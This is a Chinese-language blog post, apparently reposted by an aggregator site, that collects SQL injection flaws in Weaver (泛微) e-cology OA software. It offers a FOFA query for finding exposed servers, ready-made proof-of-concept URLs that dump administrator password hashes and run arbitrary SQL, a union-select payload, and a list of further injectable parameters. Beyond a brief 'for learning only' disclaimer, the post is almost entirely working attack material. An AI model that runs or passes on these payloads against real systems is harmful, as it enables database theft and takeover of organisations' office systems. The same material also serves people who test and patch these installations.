2021年進(jìn)入網(wǎng)絡(luò)安全行業(yè)，作為網(wǎng)絡(luò)安全的小白，分享一些自學(xué)基礎(chǔ)教程給大家。希望在自己能體系化的總結(jié)自己已有的知識的同時，能對各位博友有所幫助。文章內(nèi)容比較基礎(chǔ)，都是參考了很多大神的文章，各位不喜勿噴，謝謝！如果文章對您有幫助，將是我創(chuàng)作的最大動力！
工作中遇到的漏洞，記錄一下，本文僅作學(xué)習(xí)之用，請勿進(jìn)行網(wǎng)絡(luò)犯罪，遵守《網(wǎng)絡(luò)安全法》等相關(guān)法律法規(guī)。

漏洞描述

泛微OA不同版本都存在SQL注入漏洞

FOFA

app=“泛微-協(xié)同辦公OA”

漏洞復(fù)現(xiàn)

1、泛微OA V8 SQL注入漏洞

POC

http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

返回了數(shù)據(jù)庫第一條記錄的值
通過解密后，可以登錄后臺（漏洞原理可參考附錄文章）

2、泛微OA某版本的SQL注入漏洞（核實中）

POC

http://xxx.xxx.xxx.xxx/Api/portal/elementEcodeAddon/getSqlData?sql=select%20user

3、后臺SQL注入

使用測試賬戶登錄，然后訪問

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID參數(shù)能夠注射SQL語句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

管理員情況下的注入：

http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1

普通用戶注入:

http://xx.cn//cowork/CoworkLogView.jsp?id=151

普通用戶注入地址：

http://xx.cn/system/basedata/basedata_role.jsp?roleid=32

普通用戶注入地址：

http://xx.cn//system/basedata/basedata_hrm.jsp?resourceid=3

繼續(xù)收集中，未完待續(xù)…

參考文章

泛微OA V8 SQL注入漏洞

總結(jié)

以上是生活随笔為你收集整理的泛微OA-SQL注入漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。